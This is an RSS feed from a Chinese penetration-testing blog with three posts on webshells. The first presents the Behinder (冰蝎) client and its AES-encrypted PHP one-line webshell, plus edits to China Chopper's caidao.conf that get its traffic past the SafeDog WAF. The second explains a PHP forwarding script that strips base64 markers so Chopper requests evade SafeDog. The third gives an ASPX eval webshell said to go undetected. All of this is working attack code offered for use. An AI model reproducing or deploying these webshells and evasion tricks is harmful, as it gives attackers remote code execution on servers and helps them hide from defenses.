<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>菜刀 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E8%8F%9C%E5%88%80/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:22:57 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>冰蝎动态二进制加密过waf并修改自己菜刀过狗</title>
		<link>/web/580.html</link>
					<comments>/web/580.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Mon, 15 Oct 2018 03:43:52 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[一句话]]></category>
		<category><![CDATA[冰蝎]]></category>
		<category><![CDATA[菜刀]]></category>
		<category><![CDATA[过狗]]></category>
		<guid isPermaLink="false">/?p=580</guid>

					<description><![CDATA[rebeyond大大出的神器冰蝎下载地址 作为新型加密网站管理客户端，冰蝎算是作为中国菜刀的替代者。我们来看下他的主要功能。 主要功能 1. 基本信息 客户端和服务端握手之后，会获...]]></description>
										<content:encoded><![CDATA[<blockquote>
<p class="md-end-block" contenteditable="true"><span class="md-expand">rebeyond大大出的神器<span class="wpcom_tag_link"><a href="/tags/%e5%86%b0%e8%9d%8e" title="冰蝎" target="_blank">冰蝎</a></span></span><span class=" md-link"><a spellcheck="false" href="https://github.com/rebeyond/Behinder/releases">下载地址</a></span></p>
</blockquote>
<p class="md-end-block" contenteditable="true">作为新型加密网站管理客户端，冰蝎算是作为中国<span class="wpcom_tag_link"><a href="/tags/%e8%8f%9c%e5%88%80" title="菜刀" target="_blank">菜刀</a></span>的替代者。我们来看下他的主要功能。</p>
<h1 class="md-end-block md-heading" contenteditable="true"><span class="">主要功能</span></h1>
<h3 class="md-end-block md-heading" contenteditable="true"><span class="">1. 基本信息</span></h3>
<p class="md-end-block" contenteditable="true"><span class="">客户端和服务端握手之后，会获取服务器的基本信息，Java、.NET版本包括环境变量、系统属性等，PHP版本会显示phpinfo的内容。</span></p>
<h3 class="md-end-block md-heading" contenteditable="true"><span class="">2. 文件管理</span></h3>
<p class="md-end-block" contenteditable="true">这个没什么好说的，无非是文件的增删改查，稍微不同的是上传的文件都是加密传输的，可以避免被拦截。</p>
<h3 class="md-end-block md-heading" contenteditable="true">3. 命令执行</h3>
<p class="md-end-block" contenteditable="true"><span class="">执行单条操作系统命令。</span></p>
<h3 class="md-end-block md-heading" contenteditable="true"><span class="">4. 虚拟终端</span></h3>
<p class="md-end-block" contenteditable="true">虚拟终端是模拟了一个真实的交互式Shell环境，相当于把服务器侧的Shell给搬到了客户端，在这个Shell里可以执行各种需要交互式的命令，如ssh、mysql。比如说：我们可以在这个Shell里去ssh连接服务器侧内网的其他主机，可以参考下面这个动图： <span class=" md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162425-3f32bef2-bfd3-1.gif"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162425-3f32bef2-bfd3-1.gif"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162425-3f32bef2-bfd3-1.gif" /></span></a></span></p>
<p class="md-end-block" contenteditable="true">当然，如果你习惯powershell，也可以弹个powershell出来，如下图：</p>
<p class="md-end-block" contenteditable="true"><span class=" md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162509-5989eb36-bfd3-1.gif"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162509-5989eb36-bfd3-1.gif"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162509-5989eb36-bfd3-1.gif" /></span></a></span></p>
<h3 class="md-end-block md-heading" contenteditable="true">5. Socks代理</h3>
<p class="md-end-block" contenteditable="true">虚拟终端功能其实就已经部分实现了内网穿透的能力，在Shell环境里做的所有事情都是在内网环境中的。不过为了方便使用其他工具，客户端还提供了基于<span class="wpcom_tag_link"><a href="/tags/%e4%b8%80%e5%8f%a5%e8%af%9d" title="一句话" target="_blank">一句话</a></span>木马的Socks代理功能，一键开启，简单高效，可以参考如下动图：</p>
<p class="md-end-block" contenteditable="true"><span class=" md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162620-839c5d50-bfd3-1.gif"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162620-839c5d50-bfd3-1.gif"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162620-839c5d50-bfd3-1.gif" /></span></a></span></p>
<p class="md-end-block" contenteditable="true">顺便说一下，代理过程中所有的流量都是在socks的基础上封装了一层AES。</p>
<h3 class="md-end-block md-heading" contenteditable="true">6.反弹Shell</h3>
<p class="md-end-block" contenteditable="true">反弹Shell是突破防火墙的利器，也几乎是后渗透过程的必备步骤。提到后渗透，当然少不了metasploit，提到metasploit，当然少不了meterpreter，所以冰蝎客户端提供了两种反弹Shell的方式，常规Shell和Meterpreter，实现和metasploit的一键无缝对接。请参考如下动图：</p>
<p class="md-end-block" contenteditable="true"><span class=" md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162737-b16662f8-bfd3-1.gif"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162737-b16662f8-bfd3-1.gif"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162737-b16662f8-bfd3-1.gif" /></span></a></span></p>
<p class="md-end-block" contenteditable="true">上图演示的是Meterpreter，当然常规的Shell也可以对接metasploit，就不演示了。</p>
<h3 class="md-end-block md-heading" contenteditable="true">7.数据库管理</h3>
<p class="md-end-block" contenteditable="true">常规功能，实现了数据库的可视化管理，放张截图吧： <span class="md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162809-c4b25d8a-bfd3-1.png"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162809-c4b25d8a-bfd3-1.png"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162809-c4b25d8a-bfd3-1.png" /></span></a></span></p>
<p class="md-end-block" contenteditable="true"><span class="">和常规管理工具不同的是，在Java和.NET环境中，当目标机器中没有对应数据库的驱动时，会自动上传并加载数据库驱动。比如目标程序用的是MySQL的数据，但是内网有另外一台Oracle，此时就会自动上传并加载Oracle对应的驱动。</span></p>
<h3 class="md-end-block md-heading" contenteditable="true">8.自定义代码</h3>
<p class="md-end-block" contenteditable="true"><span class="">可以在服务端执行任意的Java、PHP、C#代码，这也是个常规功能，值得一提的是我们输入的代码都是加密传输的，所以不用为了躲避waf而用各种编码变形，效果请参考如下动图：</span></p>
<p class="md-end-block" contenteditable="true"><span class=" md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162856-e09cdbf6-bfd3-1.gif"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162856-e09cdbf6-bfd3-1.gif"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162856-e09cdbf6-bfd3-1.gif" /></span></a></span></p>
<h3 class="md-end-block md-heading" contenteditable="true">9.备忘录</h3>
<p class="md-end-block" contenteditable="true"><span class="">渗透的时候总有很多零碎的信息需要记录，所以针对每个Shell提供了一个备忘录的功能，目前只支持纯文本，粘贴进去自动保存：</span></p>
<p class="md-end-block" contenteditable="true"><span class="md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162934-f7650e12-bfd3-1.png"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162934-f7650e12-bfd3-1.png"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162934-f7650e12-bfd3-1.png" /></span></a></span></p>
<h1 class="md-end-block md-heading" contenteditable="true">接下来我们看下他的亮点出在哪里</h1>
<p><span class="">看下他的php一句话</span></p>
<pre class="lang:default decode:true ">&lt;?php session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&amp;$b[0]($b[1]);?&gt;
</pre>
<p>&nbsp;</p>
<p>为了代码可读性，我们来扩充下：</p>
<pre class="lang:default decode:true ">&lt;?php
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $decrptContent=openssl_decrypt(file_get_contents("php://input"), "AES128", $key);
    $arr=explode('|',$decrptContent);
    $func=$arr[0];
    $params=$arr[1];
    $func($params);
}
?&gt;</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">介绍下流程</p>
<ul class="ul-list" data-mark="-">
<li class="md-list-item">
<p class="md-end-block" contenteditable="true"><span class="">首先get发起带密码的请求，服务端随机产生密钥存入session。</span></p>
</li>
<li class="md-list-item">
<p class="md-end-block" contenteditable="true"><span class="">获取session中的密钥，然后将客户端发送的源代码进行aes加密，通过</span><span spellcheck="false"><code>|</code></span><span class="">分割，然后通过php的可变函数执行。</span></p>
</li>
</ul>
<p class="md-end-block" contenteditable="true"><span class="">具体一点，比如我们客户端有一段代码</span></p>
<pre class="lang:default decode:true ">assert|eval("phpinfo();")</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">进行aes128加密发送给服务端，服务端用<span spellcheck="false"><code>explode</code></span>函数分割字符，索引为0的是<span spellcheck="false"><code>assert</code></span>，索引为1的是<span spellcheck="false"><code>eval("phpinfo();")</code></span>，然后通过可变函数执行<span spellcheck="false"><code>assert("eval(\"phpinfo();\")")</code></span>，这样就很清晰明了了。</p>
<h1 class="md-end-block md-heading" contenteditable="true"><span class="">过waf的效果</span></h1>
<p class="md-end-block" contenteditable="true">常规一句话<span class="" spellcheck="false"><code>&lt;?php @eval($_POST['caidao']);?&gt;</code></span>菜刀链接：</p>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180921104312-1560723c-bd48-1.png"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180921104312-1560723c-bd48-1.png" /></span></p>
<p class="md-end-block" contenteditable="true">新型一句话冰蝎链接：</p>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180921104326-1d78ff8e-bd48-1.png"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180921104326-1d78ff8e-bd48-1.png" /></span></p>
<h1 class="md-end-block md-heading" contenteditable="true">对菜刀的修改</h1>
<p class="md-end-block" contenteditable="true">对这个一句话颇感兴趣，那么我们是不是可以把菜刀也改一改呢？</p>
<p class="md-end-block" contenteditable="true">我本地搭建了环境，一句话内容为<span class="" spellcheck="false"><code>&lt;?php @eval($_POST['caidao']);?&gt;</code></span></p>
<p><span class="">先来抓包看下菜刀的请求包</span></p>
<p><a href="https://img.chabug.org/img/20181015111909.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181015111909.png" width="1595" height="616" /></a></p>
<p class="md-end-block md-focus" contenteditable="true"><span class="md-expand">在新版菜刀2016的caidao.conf中45行，</span><span class="" spellcheck="false"><code>%s</code></span><span class="">是执行的命令</span></p>
<pre class="lang:default decode:true ">ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&amp;id=%s</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true"><span class="">解密后</span></p>
<pre class="lang:default decode:true ">eval(base64_decode($_POST[id]));&amp;id=%s</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">那么我们的一句话可以这样写</p>
<pre class="lang:default decode:true ">&lt;?php
if ($_GET['pass']!=1){
}
else{
    $decrpt = file_get_contents("php://input");
    $arrs = explode("|", $decrpt)[1];
    $arrs = explode("|", base64_decode($arrs));
    call_user_func($arrs[0],$arrs[1]);
}
​
?&gt;</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">你也可以这样来</p>
<pre class="lang:default decode:true ">&lt;?php
$decrpt = $_POST['x'];
$arrs = explode("|", $decrpt)[1];
$arrs = explode("|", base64_decode($arrs));
var_dump($arrs[0],$arrs[1]);
call_user_func($arrs[0],$arrs[1]);
?&gt;</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true"><span class="">那么我们菜刀要改下</span></p>
<pre class="lang:default decode:true ">|assert|eval(base64_decode($_POST[id]));|&amp;id=%s</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true"><span class="">在caidao.conf的45行就要改成</span></p>
<pre class="lang:default decode:true ">|YXNzZXJ0fGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbaWRdKSk7|&amp;id=%s</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">这样和冰蝎实现的效果就一样了，<span class=""><strong>同样<span class="wpcom_tag_link"><a href="/tags/%e8%bf%87%e7%8b%97" title="过狗" target="_blank">过狗</a></span></strong></span><span class="">，愉快玩耍吧！</span></p>
<p class="md-end-block" contenteditable="true"><span class="">涉及到的资料，表示感谢！</span></p>
<p class="md-end-block" contenteditable="true"><span class="md-link" spellcheck="false"><a href="https://www.t00ls.net/thread-48079-1-1.html">https://www.t00ls.net/thread-48079-1-1.html</a></span></p>
<p class="md-end-block" contenteditable="true"><span class="md-link md-expand" spellcheck="false"><a href="https://xz.aliyun.com/t/2774">https://xz.aliyun.com/t/2774</a></span></p>
]]></content:encoded>
					
					<wfw:commentRss>/web/580.html/feed</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>本地转发过狗原理</title>
		<link>/web/542.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Mon, 20 Aug 2018 07:01:53 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[菜刀]]></category>
		<category><![CDATA[转发]]></category>
		<category><![CDATA[过狗]]></category>
		<guid isPermaLink="false">/?p=542</guid>

					<description><![CDATA[在土司发了篇水文，有朋友问本地转发过狗的原理。虽然早就用了但是一直没认真研究过，借此机会研究一下。脚本非原创，链接文末贴出。 发现安全狗检测特征 网站存在安全狗的情况下即使上传了一...]]></description>
										<content:encoded><![CDATA[<blockquote>
<p class="">在土司发了篇<a href="https://www.t00ls.net/articles-47306.html" rel="noopener">水文</a>，有朋友问本地<span class="wpcom_tag_link"><a href="/tags/%e8%bd%ac%e5%8f%91" title="转发" target="_blank">转发</a></span><span class="wpcom_tag_link"><a href="/tags/%e8%bf%87%e7%8b%97" title="过狗" target="_blank">过狗</a></span>的原理。虽然早就用了但是一直没认真研究过，借此机会研究一下。脚本非原创，链接文末贴出。</p>
</blockquote>
<h1>发现安全狗检测特征</h1>
<p>网站存在安全狗的情况下即使上传了一句话<span class="wpcom_tag_link"><a href="/tags/%e8%8f%9c%e5%88%80" title="菜刀" target="_blank">菜刀</a></span>也连不上，尤其是iis7.5解析漏洞，xx.jpg/.php解析了一句话并且安全狗不拦截，但是连不上shell就很头疼。<br />
首先要知道安全狗是如何检测并拦截的。“经过分析发现安全狗对菜刀的HTTP进行了拦截，菜刀的POST数据里面对eval数据进行了base64编码，安全狗也是利用该特征进行检测的。”这是脚本作者原话(这里不确定是否为原作者，因为我只是在他博客看到的文章。)<br />
具体安全狗是否是利用该特征对菜刀的http进行检测的，我没有研究过，但是取消掉base64编码安全狗的确不拦截了，所以这里就认为是利用该特征进行检测。</p>
<h1>菜刀post数据分析</h1>
<p>研究转发脚本先对菜刀的post数据分析一下，方便理解脚本。<br />
利用wireshark对菜刀抓包分析发现，当我们自写脚本执行print(“test”)时，菜刀的post数据内容为:</p>
<pre class="lang:default decode:true ">test=@eval(base64_decode($_POST[z0]));&amp;z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOztwcmludCgiaGVsbG8gUEhQISIpOztlY2hvKCJ8PC0iKTtkaWUoKTs=
</pre>
<p>&nbsp;</p>
<p>这里的test，为我们上传的一句话的密码”&lt;?php @eval($_POST[‘test’]); ?&gt;”。<br />
可以看到数据包的内容，菜刀将编码的部分解码然后发送给服务端（编码是为了防止特殊字符导致执行出现错误）。将后面的base64编码内容解码</p>
<pre class="lang:default decode:true">@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-&gt;|");;print("hello PHP!");;echo("|&lt;-");die();
</pre>
<p>都很容易理解就不废话了。</p>
<h1>转发脚本原理</h1>
<p>为了便于理解我画了一张图<br />
<a id="ui-id-1" class="fancy-ctn fancybox" title="原理" href="http://www.evi1.cn/img/web/bypass/yl.png" rel="fancy-group"><img loading="lazy" title="原理" src="http://www.evi1.cn/img/web/bypass/yl.png" alt="原理" width="undefined" height="undefined" /></a><br />
转发脚本源代码:</p>
<pre class="lang:default decode:true ">&lt;?php $target="";//webshell地址
$poststr='';
$i=0;
foreach($_POST as $k=&gt;$v)
{
    if(strstr($v, "base64_decode"))
        {
            $v=str_replace("base64_decode(","",$v);
            $v=str_replace("))",")",$v);
        }else
        {
            if($k==="z0")
                $v=base64_decode($v);
        }
    $pp=$k."=".urlencode($v);
    // echo $pp;
    if($i!=0)
    {
        $poststr=$poststr."&amp;".$pp;
    }
    else
    {
        $poststr=$pp;
    }
    $i=$i+1;
}
$ch = curl_init();
$curl_url = $target."?".$_SERVER['QUERY_STRING']; 
curl_setopt($ch, CURLOPT_URL, $curl_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?&gt;</pre>
<p>&nbsp;</p>
<p>先分析foreach这一段:</p>
<pre class="lang:default decode:true ">foreach($_POST as $k=&gt;$v)
{
    if(strstr($v, "base64_decode"))
        {
            $v=str_replace("base64_decode(","",$v);
            $v=str_replace("))",")",$v);
        }else
        {
            if($k==="z0")
                $v=base64_decode($v);
        }
    $pp=$k."=".urlencode($v);
    // echo $pp;
    if($i!=0)
    {
        $poststr=$poststr."&amp;".$pp;
    }
    else
    {
        $poststr=$pp;
    }
    $i=$i+1;
}</pre>
<p>&nbsp;</p>
<p>去除$_POST数组中的键值，利用strstr函数匹配到base64_decode函数并返回剩下的字符串，然后取出z0的值base64_decode解码。经过第一个if条件语句处理完以后数据变为</p>
<pre class="lang:default decode:true ">test=@eval($_POST[z0]);@ini_set(“display_errors”,”0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo(“-&gt;|”);;print(“hello PHP!”);;echo(“|&lt;-“);die();</pre>
<p>&nbsp;</p>
<p>将数据urlencode(服务端接收参数数据时会自动解码),剩下的的代码就是将两段数据用&amp;连接起来。</p>
<pre class="lang:default decode:true ">$ch = curl_init();
$curl_url = $target."?".$_SERVER['QUERY_STRING']; //获取url?后的值
curl_setopt($ch, CURLOPT_URL, $curl_url);//设置curl传输选项
curl_setopt($ch, CURLOPT_POST, 1);//发送post请求
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);// 全部数据使用HTTP协议中的 "POST" 操作来发送 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//TRUE 将curl_exec()获取的信息以字符串返回，而不是直接输出。
$result = curl_exec($ch);//执行
curl_close($ch);//关闭
echo $result;
?&gt;</pre>
<p>&nbsp;</p>
<p>emmmm,cURL我理解为就是去访问shell地址的页面。这里我将注释写到了代码后面。<br />
这里有个地方没有深入了解，就是为什么post的数据需要urlencode,我测试的时候去掉了该编码函数，菜刀连接提示页面返回信息有误，不知道是代码的原因还是不编码的话就被安全狗给拦截了。希望有懂的师傅指点一下。</p>
<p>参考文章：<br />
<a href="https://www.cnblogs.com/h4ck0ne/p/5154569.html" target="_blank" rel="noopener noreferrer">h4ck0ne</a><br />
<a href="https://www.cnblogs.com/milantgh/p/4285735.html" target="_blank" rel="noopener noreferrer">中国菜刀原理</a></p>
<p><em>任重而道远</em></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>aspx 过狗一句话</title>
		<link>/tools/374.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 07 Mar 2018 17:41:03 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[aspx]]></category>
		<category><![CDATA[一句话]]></category>
		<category><![CDATA[菜刀]]></category>
		<category><![CDATA[过狗]]></category>
		<category><![CDATA[过狗一句话]]></category>
		<guid isPermaLink="false">/?p=278</guid>

					<description><![CDATA[https://exp10it.cn/2018/03/07/aspx-bypass-safedog.html 原理未知 安全狗竟然查杀不了这么 nb 的 code &#60;%@ P...]]></description>
										<content:encoded><![CDATA[<p><a href="https://exp10it.cn/2018/03/07/aspx-bypass-safedog.html">https://exp10it.cn/2018/03/07/aspx-bypass-safedog.html</a></p>
<p>原理未知</p>
<p>安全狗竟然查杀不了这么 nb 的 code</p>
<pre>&lt;%@ Page Language="Jscript"%&gt;
&lt;%eval(/*s*/ Request.Item["pass"],"unsafe");%&gt;</pre>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
